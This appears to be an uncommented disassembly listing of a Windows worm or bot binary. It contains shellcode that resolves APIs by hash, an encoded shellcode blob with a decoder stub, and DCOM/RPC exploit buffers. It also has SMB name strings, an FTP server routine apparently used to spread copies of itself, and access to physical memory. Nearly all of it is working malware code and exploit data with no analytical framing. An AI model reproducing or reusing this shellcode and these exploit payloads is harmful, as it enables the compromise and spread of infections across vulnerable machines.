unk_43A138 db 81h ; ; DATA XREF: sub_401766+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
dword_43A184 dd 158h
; =============== S U B R O U T I N E =======================================
sub_43A188 proc near ; DATA XREF: .text:0040181B�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_43A284
push dword ptr [esi]
push 63D61209h
call sub_43A29A
mov [esi+8], eax
call sub_43A24D
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_43A29A
mov [esi+0Ch], eax
call sub_43A1FF
push dword ptr [esi+4]
push 4C0297FAh
call sub_43A29A
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_43A188 endp
; =============== S U B R O U T I N E =======================================
sub_43A1FF proc near ; CODE XREF: sub_43A188+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_43A228
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_43A1FF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43A228 proc near ; CODE XREF: sub_43A1FF+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_43A237: ; CODE XREF: sub_43A228+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_43A244
inc ebx
jmp short loc_43A237
; ---------------------------------------------------------------------------
loc_43A244: ; CODE XREF: sub_43A228+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_43A228 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43A24D proc near ; CODE XREF: sub_43A188+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_43A265: ; CODE XREF: sub_43A24D+1E�j
cmp [ecx], ebx
jz short loc_43A26D
mov ecx, [ecx]
jmp short loc_43A265
; ---------------------------------------------------------------------------
loc_43A26D: ; CODE XREF: sub_43A24D+1A�j
mov edx, edi
loc_43A26F: ; CODE XREF: sub_43A24D+2A�j
cmp [edx+4], ebx
jz short loc_43A279
mov edx, [edx+4]
jmp short loc_43A26F
; ---------------------------------------------------------------------------
loc_43A279: ; CODE XREF: sub_43A24D+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_43A24D endp
; =============== S U B R O U T I N E =======================================
sub_43A284 proc near ; CODE XREF: sub_43A188+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_43A284 endp
; =============== S U B R O U T I N E =======================================
sub_43A29A proc near ; CODE XREF: sub_43A188+16�p
; sub_43A188+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_43A2B0: ; CODE XREF: sub_43A29A+33�j
jecxz short loc_43A2EA
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_43A2BD: ; CODE XREF: sub_43A29A+2D�j
lodsb
cmp al, ah
jz short loc_43A2C9
ror edi, 0Dh
add edi, eax
jmp short loc_43A2BD
; ---------------------------------------------------------------------------
loc_43A2C9: ; CODE XREF: sub_43A29A+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_43A2B0
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_43A2EA: ; CODE XREF: sub_43A29A:loc_43A2B0�j
; sub_43A29A:loc_43A2EA�j
jmp short loc_43A2EA
sub_43A29A endp
; ---------------------------------------------------------------------------
align 10h
dword_43A2F0 dd 0F254C481h, 0FFFFhdword_43A2F8 dd 23h dword_43A2FC dd 60h dword_43A300 dd 62B0606h, 2050501h, 0A0hdword_43A30C dd 30h ; sub_401F44+7C�o ...
dword_43A310 dd 0A1h dword_43A314 dd 3 aCccc db 'CCCC',0 ; DATA XREF: sub_40126C+153�o
align 10h
loc_43A320: ; DATA XREF: sub_40126C+E8�o
jmp short near ptr dword_43A328
; ---------------------------------------------------------------------------
align 8
dword_43A328 dd 0 aSSSExD db '%s %s -> %s (Ex: %d)',0 ; DATA XREF: .text:00401911�o
; sub_403B6C+155�o ...
align 8
aD1 db 'd1',0 ; DATA XREF: sub_402646+FC�o
; sub_40A938+973F�o
align 4
dd 2 dup(0)
db 3 dup(0)
dword_43A357 dd 33314344h ; .text:00401967�r ...
db 35h
dd 7 dup(0)
dword_43A378 dd 87h ; sub_40A938+5F42�r ...
off_43A37C dd offset sub_403B6C ; DATA XREF: sub_402646+174�r
dword_43A380 dd 0 ; .text:00401960�r ...
dword_43A384 dd 1 dd 3264h, 2 dup(0)
dd 44000000h, 3243h, 7 dup(0)
dd 87h, 403D55h, 0
dd 1, 3364h, 2 dup(0)
db 3 dup(0)
byte_43A3D7 db 44h ; DATA XREF: sub_406D50+296�o
dd 3343h, 7 dup(0)
dd 87h, 404105h, 0
dd 1, 736B6Eh, 2 dup(0)
db 3 dup(0)
byte_43A417 db 4Eh ; DATA XREF: sub_406D50+498�o
dd 3250h, 7 dup(0)
dd 1BDh, 406391h, 0
dd 1, 656Eh, 2 dup(0)
db 3 dup(0)
byte_43A457 db 4Eh ; DATA XREF: sub_406D50+2F6�o
dd 3245h, 7 dup(0)
dd 8Bh, 4066B3h, 0
dd 1, 61h, 2 dup(0)
dd 41000000h, 4E53h, 7 dup(0)
dd 8Bh, 4017B8h, 0
dd 1, 31626Eh, 2 dup(0)
db 3 dup(0)
byte_43A4D7 db 4Eh ; DATA XREF: sub_406D50+39D�o
dd 42h, 7 dup(0)
dd 8Bh, 405990h, 2 dup(0)
dd 32626Eh, 2 dup(0)
dd 4E000000h, 42h, 7 dup(0)
dd 1BDh, 405990h, 2 dup(0)
dd 76h, 2 dup(0)
dd 56000000h, 434Eh, 7 dup(0)
dd 170Ch, 40813Ah, 0
dd 1, 6276h, 2 dup(0)
dd 56000000h, 42434Eh, 7 dup(0)
dd 170Ch, 409616h, 0
dd 1, 73h, 2 dup(0)
db 3 dup(0)
off_43A5D7 dd offset byte_565253 ; DATA XREF: sub_406D50+3FD�o
align 4
dd 7 dup(0)
dd 1BDh, 407373h, 0
dd 1, 656B77h, 2 dup(0)
dd 57000000h, 454Bh, 7 dup(0)
dd 8Bh, 409D2Eh, 0
dd 1, 31656B77h, 2 dup(0)
dd 57000000h, 31454Bh, 7 dup(0)
dd 1BDh, 409D2Eh, 0
dd 1, 6F6B77h, 2 dup(0)
dd 57000000h, 4F4Bh, 7 dup(0)
dd 8Bh, 409DC8h, 0
dd 1, 316F6B77h, 2 dup(0)
dd 57000000h, 314F4Bh, 7 dup(0)
dd 1BDh, 409DC8h, 0
dd 1, 736B77h, 2 dup(0)
dd 57000000h, 534Bh, 7 dup(0)
dd 8Bh, 409F99h, 0
dd 1, 31736B77h, 2 dup(0)
dd 57000000h, 31534Bh, 7 dup(0)
dd 1BDh, 409F99h, 0
dd 1, 10h dup(0)
dword_43A7C8 dd 3164h, 2 dup(0) dd 1000000h, 73h, 2 dup(0)
dd 1000000h
dword_43A7E8 dd 3364h, 2 dup(0) dd 1000000h, 316F6B77h, 2 dup(0)
dd 1000000h
dword_43A808 dd 656Eh, 2 dup(0) dd 1000000h, 31626Eh, 2 dup(0)
dd 1000000h
dword_43A828 dd 3164h, 2 dup(0) dd 1000000h, 3264h, 2 dup(0)
dd 1000000h
dword_43A848 dd 73h, 2 dup(0) dd 1000000h, 736B6Eh, 2 dup(0)
dd 1000000h
dword_43A868 dd 76h, 2 dup(0) dd 1000000h, 6276h, 2 dup(0)
dd 1000000h
dword_43A888 dd 73h, 2 dup(0) dd 1000000h, 736B77h, 2 dup(0)
dd 1000000h
dword_43A8A8 dd 3364h, 2 dup(0) dd 1000000h, 31656B77h, 2 dup(0)
dd 1000000h
dword_43A8C8 dd 2 dword_43A8CC dd 2 dword_43A8D0 dd 2 dword_43A8D4 dd 2 dword_43A8D8 dd 2 dword_43A8DC dd 2 dword_43A8E0 dd 2 dword_43A8E4 dd 2 dword_43A8E8 dd 0E983C929h, 0FFFFE8B0h, 5EC0FFFFh, 970E7681h, 839CBE56h
; DATA XREF: .text:004017FC�o
; sub_403941+4B�o ...
dd 0F4E2FCEEh, 0D1553C6Bh, 6341AF7Fh, 0F0353668h, 0D93572B3h
dd 99C2DDABh, 175157EFh, 0C3354ED8h, 0D55557B7h, 9D35621Ch
dd 57E6779h, 0E87ED23Bh, 91749790h, 68559496h, 0B49A02ACh
dd 0C335B3E2h, 0FA5557B3h, 17F55A1Ch, 77BF4AC8h, 15357A94h
dd 0FDA272FBh, 0F8656754h, 178E151Ch, 0EC355AD7h, 0DC35FB8Bh
dd 12D6089Fh, 0CC5258D9h, 0CFD88068h, 0AE8D3EF1h, 0AECD21FFh
dd 4C4102C8h, 60539DFFh, 4A4106ACh, 0FA5BDFC8h, 9EB6BB16h
dd 63BC3CC2h, 95673E47h, 63E9FB62h, 0CFED0541h, 0CFFD05C4h
dd 4C4105D4h, 0F6BA3EF1h, 7D3705F1h, 861A3E02h, 63E991E7h
dd 0CDAE3C41h, 0F46EA9C2h, 7590FB33h, 0CF68A9C0h, 0F46EA9C2h
dd 0D5381F72h, 0CC68A9C0h, 63EB02C3h, 7BD6C547h, 0CBC790EEh
dd 63EB8068h, 0F8D43047h, 0F1DD3EF1h, 0CCD4B31Eh, 15727FCEh
dd 15FA3C70h, 6F7E6775h, 0B1FCA83Dh, 0F921469h, 37862C1Ah
dd 0EED6FD3Ch, 63A8E569h, 4A4112E2h, 0CDEC01CCh, 9DD407C6h
dd 0CDEB07C6h, 31D68668h, 0CF70534Eh, 63D48068h, 4C416168h
dd 1F42011Ch, 4A413253h, 0F46EA9C5h, 0FC5E9878h, 6368A9C4h
dd 9CBE5647h, 0
dd 159h
aEftpdDTotalDIn db ' (EFTPD): (%d), Total -> (%d in %s)',0 ; DATA XREF: sub_401990+9A�o
aSD_0 db ' (%s: %d),',0 ; DATA XREF: sub_401990+4C�o
align 4
aSStats db '%s (Stats):',0 ; DATA XREF: sub_401990+1A�o
aCCCCCC db '%c%c%c%c%c%c',0 ; DATA XREF: sub_401A77+66�o
; sub_40A938+5B34�o
align 4
aSCCCCC db '%s%c%c%c%c%c',0 ; DATA XREF: sub_401AF0+6B�o
align 4
aS_6 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401B6E+2C2�o
; sub_4063FA+251�o ...
align 10h
aSSSDSSSSSSSS_0 db '%s %s %s %d >> %s %s %s %s %s >> %s %s %s >> %s %s %s %s >> %s %s'
; DATA XREF: sub_401B6E+27D�o
; sub_4063FA+210�o
db ' %s >> %s %s%s %s %s',0Dh,0Ah,0
aSSSDSSSSSSSSSS db '%s %s %s %d >> %s %s %s %s %s >> %s %s %s %s >> %s %s %s >> %s %s'
; DATA XREF: sub_401B6E+1ED�o
; sub_4063FA+180�o
db '%s %s %s',0Dh,0Ah,0
aSDDDDD_exe db '%s%d%d%d%d%d.exe',0 ; DATA XREF: sub_401B6E+137�o
; sub_4053EE+285�o ...
align 4
off_43AB68 dd offset dword_5C005C ; DATA XREF: sub_401E8E+16�o
align 10h
off_43AB70 dd offset dword_49005C ; DATA XREF: sub_401E8E+B�o
dd offset loc_430050
dd 24h
dword_43AB7C dd 252E7325h, 73252E73h, 73252Eh ; sub_402CBA+398�o
dword_43AB88 dd 78h ; sub_401F44+A3�o ...
dword_43AB8C dd 2Eh ; sub_405C6A+2D�o ...
dword_43AB90 dd 49207325h, 7463616Eh, 657669hdword_43AB9C dd 28207325h, 29504943h, 7325203Ah, 0aSSSISS_ db '%s %s, %s: %i, %s: %s.',0 ; DATA XREF: sub_4020AA+D3�o
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40221C+38�o
aSSAtSDAfterDMi db '%s %s at %s:%d after %d minute(s).',0 ; DATA XREF: sub_40242A+1D2�o
align 4
aSSDThreadDSubT db '%s %s:%d, Thread: %d, Sub-thread: %d.',0 ; DATA XREF: sub_40242A+119�o
align 4
aSSD_0 db '%s %s: <%d>',0 ; DATA XREF: sub_40242A+98�o
; sub_423BB1+A5�o ...
aSSSSDOpen_ db '%s %s%s: %s:%d open.',0 ; DATA XREF: sub_402646+C3�o
align 10h
aZwopensection db 'ZwOpenSection',0 ; DATA XREF: sub_4027F3+23�o
align 10h
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_4027F3+1B�o
align 4
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_4027F3�o
align 4
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_40285A+5D�o
align 4
off_43AC84 dd offset aRy6iq0udbphN2n+24h ; DATA XREF: sub_402900+31�o
aEvicePhysicalm:
unicode 0, <evice\PhysicalMemory>,0
align 4
aSesecuritypriv db 'SeSecurityPrivilege',0 ; DATA XREF: sub_402BA8:loc_402C0F�o
a503 db '503',0Dh,0Ah,0 ; DATA XREF: sub_402CBA:loc_4031F3�o
align 10h
a221 db '221',0Dh,0Ah,0 ; DATA XREF: sub_402CBA+51E�o
align 4
aQuit db 'QUIT',0 ; DATA XREF: sub_402CBA+511�o
align 10h
a425 db '425',0Dh,0Ah,0 ; DATA XREF: sub_402CBA:loc_4031A9�o
align 4
aSS_2 db '%s -> %s',0 ; DATA XREF: sub_402CBA+494�o
; sub_402CBA+4C3�o
align 4
a226 db '226',0Dh,0Ah,0 ; DATA XREF: sub_402CBA+440�o
align 4
a150 db '150',0Dh,0Ah,0 ; DATA XREF: sub_402CBA+3DB�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_402CBA+3CB�o
align 4
a200 db '200',0Dh,0Ah,0 ; DATA XREF: sub_402CBA+3A3�o
align 4
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_402CBA+362�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_402CBA+324�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_402CBA+2F0�o
align 4
a230 db '230',0Dh,0Ah,0 ; DATA XREF: sub_402CBA+2CB�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_402CBA+2BF�o
align 4
a331 db '331',0Dh,0Ah,0 ; DATA XREF: sub_402CBA+29A�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_402CBA+28E�o
align 4
aSS_1 db '%s %s',0 ; DATA XREF: sub_402CBA+274�o
; sub_403374+C8�o ...
align 4
a220 db '220',0Dh,0Ah,0 ; DATA XREF: sub_402CBA:loc_402E94�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4032A3+2B�o
; .text:0040A267�o
align 10h
aSSDS db '%s %s %d %s',0 ; DATA XREF: sub_403374+75�o
; sub_42358B+36�o
align 10h
byte_43AD90 db 1 ; DATA XREF: sub_403476+25�r
align 2
dw 2
dd 80004h, 200010h, 800040h
dword_43ADA0 dd 800000h, 400000h, 200000h, 100000h, 80000h, 40000h
; DATA XREF: sub_403476+C6�r
; sub_403476+D8�r
dd 20000h, 10000h, 8000h, 4000h, 2000h, 1000h, 800h, 400h
dd 200h, 100h, 80h, 40h, 20h, 10h, 8, 4, 2, 1
byte_43AE00 db 38h ; DATA XREF: sub_403476:loc_403486�r
db 30h, 28h, 20h
dd 81018h, 21293139h, 1091119h, 222A323Ah, 20A121Ah, 232B333Bh
dd 262E363Eh, 60E161Eh, 252D353Dh, 50D151Dh, 242C343Ch
dd 40C141Ch, 30B131Bh
dword_43AE38 dd 6040201h, 0E0C0A08h, 1513110Fh, 1C1B1917h, 170A100Dh
; DATA XREF: sub_403476+6A�r
dd 1B020400h, 914050Eh, 30B1216h, 60F0719h, 10C131Ah
dword_43AE60 dd 241E3328h, 271D362Eh, 2F202C32h, 3726302Bh, 292D3421h
; DATA XREF: sub_403476:loc_40352C�r
dd 1F1C2331h
dword_43AE78 dd 1010400h, 0 ; sub_4036F2+148�r
dd 10000h, 1010404h, 1010004h, 10404h, 4, 10000h, 400h
dd 1010400h, 1010404h, 400h, 1000404h, 1010004h, 1000000h
dd 4, 404h, 2 dup(1000400h), 2 dup(10400h), 2 dup(1010000h)
dd 1000404h, 10004h, 2 dup(1000004h), 10004h, 0
dd 404h, 10404h, 1000000h, 10000h, 1010404h, 4, 1010000h
dd 1010400h, 2 dup(1000000h), 400h, 1010004h, 10000h, 10400h
dd 1000004h, 400h, 4, 1000404h, 10404h, 1010404h, 10004h
dd 1010000h, 1000404h, 1000004h, 404h, 10404h, 1010400h
dd 404h, 2 dup(1000400h), 0
dd 10004h, 10400h, 0
dd 1010004h
dword_43AF78 dd 80108020h ; sub_4036F2+189�r
dd 80008000h, 8000h, 108020h, 100000h, 20h, 80100020h
dd 80008020h, 80000020h, 80108020h, 80108000h, 80000000h
dd 80008000h, 100000h, 20h, 80100020h, 108000h, 100020h
dd 80008020h, 0
dd 80000000h, 8000h, 108020h, 80100000h, 100020h, 80000020h
dd 0
dd 108000h, 8020h, 80108000h, 80100000h, 8020h, 0
dd 108020h, 80100020h, 100000h, 80008020h, 80100000h, 80108000h
dd 8000h, 80100000h, 80008000h, 20h, 80108020h, 108020h
dd 20h, 8000h, 80000000h, 8020h, 80108000h, 100000h, 80000020h
dd 100020h, 80008020h, 80000020h, 100020h, 108000h, 0
dd 80008000h, 8020h, 80000000h, 80100020h, 80108020h, 108000h
dword_43B078 dd 208h ; sub_4036F2+152�r
dd 8020200h, 0
dd 8020008h, 8000200h, 0
dd 20208h, 8000200h, 20008h, 2 dup(8000008h), 20000h, 8020208h
dd 20008h, 8020000h, 208h, 8000000h, 8, 8020200h, 200h
dd 20200h, 8020000h, 8020008h, 20208h, 8000208h, 20200h
dd 20000h, 8000208h, 8, 8020208h, 200h, 8000000h, 8020200h
dd 8000000h, 20008h, 208h, 20000h, 8020200h, 8000200h
dd 0
dd 200h, 20008h, 8020208h, 8000200h, 8000008h, 200h, 0
dd 8020008h, 8000208h, 20000h, 8000000h, 8020208h, 8, 20208h
dd 20200h, 8000008h, 8020000h, 8000208h, 208h, 8020000h
dd 20208h, 8, 8020008h, 20200h
dword_43B178 dd 802001h ; sub_4036F2+193�r
dd 2 dup(2081h), 80h, 802080h, 800081h, 800001h, 2001h
dd 0
dd 2 dup(802000h), 802081h, 81h, 0
dd 800080h, 800001h, 1, 2000h, 800000h, 802001h, 80h, 800000h
dd 2001h, 2080h, 800081h, 1, 2080h, 800080h, 2000h, 802080h
dd 802081h, 81h, 800080h, 800001h, 802000h, 802081h, 81h
dd 2 dup(0)
dd 802000h, 2080h, 800080h, 800081h, 1, 802001h, 2 dup(2081h)
dd 80h, 802081h, 81h, 1, 2000h, 800001h, 2001h, 802080h
dd 800081h, 2001h, 2080h, 800000h, 802001h, 80h, 800000h
dd 2000h, 802080h
dword_43B278 dd 100h ; sub_4036F2+164�r
dd 2080100h, 2080000h, 42000100h, 80000h, 100h, 40000000h
dd 2080000h, 40080100h, 80000h, 2000100h, 40080100h, 42000100h
dd 42080000h, 80100h, 40000000h, 2000000h, 2 dup(40080000h)
dd 0
dd 40000100h, 2 dup(42080100h), 2000100h, 42080000h, 40000100h
dd 0
dd 42000000h, 2080100h, 2000000h, 42000000h, 80100h, 80000h
dd 42000100h, 100h, 2000000h, 40000000h, 2080000h, 42000100h
dd 40080100h, 2000100h, 40000000h, 42080000h, 2080100h
dd 40080100h, 100h, 2000000h, 42080000h, 42080100h, 80100h
dd 42000000h, 42080100h, 2080000h, 0
dd 40080000h, 42000000h, 80100h, 2000100h, 40000100h, 80000h
dd 0
dd 40080000h, 2080100h, 40000100h
dword_43B378 dd 20000010h ; sub_4036F2+1A2�r
dd 20400000h, 4000h, 20404010h, 20400000h, 10h, 20404010h
dd 400000h, 20004000h, 404010h, 400000h, 20000010h, 400010h
dd 20004000h, 20000000h, 4010h, 0
dd 400010h, 20004010h, 4000h, 404000h, 20004010h, 10h
dd 2 dup(20400010h), 0
dd offset loc_40400F+1
dd 20404000h, 4010h, 404000h, 20404000h, 20000000h, 20004000h
dd 10h, 20400010h, 404000h, 20404010h, 400000h, 4010h
dd 20000010h, 400000h, 20004000h, 20000000h, 4010h, 20000010h
dd 20404010h, 404000h, 20400000h, 404010h, 20404000h, 0
dd 20400010h, 10h, 4000h, 20400000h, 404010h, 4000h, 400010h
dd 20004010h, 0
dd 20404000h, 20000000h, 400010h, 20004010h
dword_43B478 dd 200000h ; sub_4036F2+16B�r
dd 4200002h, 4000802h, 0
dd 800h, 4000802h, 200802h, 4200800h, 4200802h, 200000h
dd 0
dd 4000002h, 2, 4000000h, 4200002h, 802h, 4000800h, 200802h
dd 200002h, 4000800h, 4000002h, 4200000h, 4200800h, 200002h
dd 4200000h, 800h, 802h, 4200802h, 200800h, 2, 4000000h
dd 200800h, 4000000h, 200800h, 200000h, 2 dup(4000802h)
dd 2 dup(4200002h), 2, 200002h, 4000000h, 4000800h, 200000h
dd 4200800h, 802h, 200802h, 4200800h, 802h, 4000002h, 4200802h
dd 4200000h, 200800h, 0
dd 2, 4200802h, 0
dd 200802h, 4200000h, 800h, 4000002h, 4000800h, 800h, 200002h
dword_43B578 dd 10001040h ; sub_4036F2+1AC�r
dd 1000h, 40000h, 10041040h, 10000000h, 10001040h, 40h
dd 10000000h, 40040h, 10040000h, 10041040h, 41000h, 10041000h
dd 41040h, 1000h, 40h, 10040000h, 10000040h, 10001000h
dd 1040h, 41000h, 40040h, 10040040h, 10041000h, 1040h
dd 2 dup(0)
dd 10040040h, 10000040h, 10001000h, 41040h, 40000h, 41040h
dd 40000h, 10041000h, 1000h, 40h, 10040040h, 1000h, 41040h
dd 10001000h, 40h, 10000040h, 10040000h, 10040040h, 10000000h
dd 40000h, 10001040h, 0
dd 10041040h, 40040h, 10000040h, 10040000h, 10001000h
dd 10001040h, 0
dd 10041040h, 2 dup(41000h), 2 dup(1040h), 40040h, 10000000h
dd 10041000h
dword_43B678 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_43B6C8 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_403941+FB�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_43BA2C dd 20h, 0 dd 20h, 5C005Ch, 0
off_43BA40 dd offset loc_43005A+2 ; DATA XREF: sub_403941+135�o
dd offset dword_5C0024
a12345611111111:
unicode 0, <123456111111111111111.doc>,0
align 10h
dword_43BA80 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
off_43BAB4 dd offset word_580046 ; DATA XREF: sub_403941+31�o
; sub_403941+72�o
dd offset loc_42004E
dd offset word_580046
dd offset word_580046
dd offset loc_42004E
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_43BB90 dd 10016C6h dword_43BB94 dd 100139Dh dword_43BB98 dd 158h align 10h
dword_43BBA0 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_43BBEC dd 3000005h, 10h, 5 dup(0)dword_43BC08 dd 10005h, 2 dup(0) dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_43BC50 dd 0 dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_43BC84: ; DATA XREF: .text:00403E81�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 10h
loc_43BC90: ; DATA XREF: .text:00403E2C�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_43BC9C: ; DATA XREF: .text:00403ED0�o
jmp short loc_43BCAE
; ---------------------------------------------------------------------------
jmp short loc_43BCB9
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_43BCA4: ; DATA XREF: .text:00403F2B�o
jmp short near ptr word_43BCAA
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_43BCAA dw 0 ; CODE XREF: .text:loc_43BCA4�j
; ---------------------------------------------------------------------------
loc_43BCAC: ; DATA XREF: .text:00403F4C�o
jmp short near ptr word_43BCB2
; ---------------------------------------------------------------------------
loc_43BCAE: ; CODE XREF: .text:loc_43BC9C�j
; .text:loc_43BCCC�j
jmp short loc_43BCB4
; ---------------------------------------------------------------------------
db 2 dup(0)
word_43BCB2 dw 0 ; CODE XREF: .text:loc_43BCAC�j
; ---------------------------------------------------------------------------
loc_43BCB4: ; CODE XREF: .text:loc_43BCAE�j
; DATA XREF: .text:00403F70�o
jmp short near ptr loc_43BCB9+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_43BCB9: ; CODE XREF: .text:0043BC9E�j
; .text:loc_43BCB4�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_43BCBC dd offset loc_41005A+2 ; DATA XREF: .text:00403FBF�o
dd 2 dup(0)
dword_43BCC8 dd 77F33723h ; ---------------------------------------------------------------------------
loc_43BCCC: ; DATA XREF: .text:00403F09�o
jmp short loc_43BCAE
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
loc_43BCD0: ; DATA XREF: .text:00403EE2�o
lahf
jnz short loc_43BCEB
loc_43BCD3: ; DATA XREF: .text:00403E71�o
add [ecx+1Ch], bl
loc_43BCD6: ; CODE XREF: .text:loc_43BCE0�j
add [ecx], al
loc_43BCD8: ; DATA XREF: .text:00403E53�o
or ecx, [ebx]
sbb eax, [eax]
loc_43BCDC: ; DATA XREF: .text:00403E62�o
jmp short near ptr dword_43BCE4
; ---------------------------------------------------------------------------
align 10h
loc_43BCE0: ; DATA XREF: .text:00403E3E�o
jmp short loc_43BCD6
; ---------------------------------------------------------------------------
align 4
dword_43BCE4 dd 0 byte_43BCE8 db 5, 0, 0Bh ; DATA XREF: sub_404105+298�o
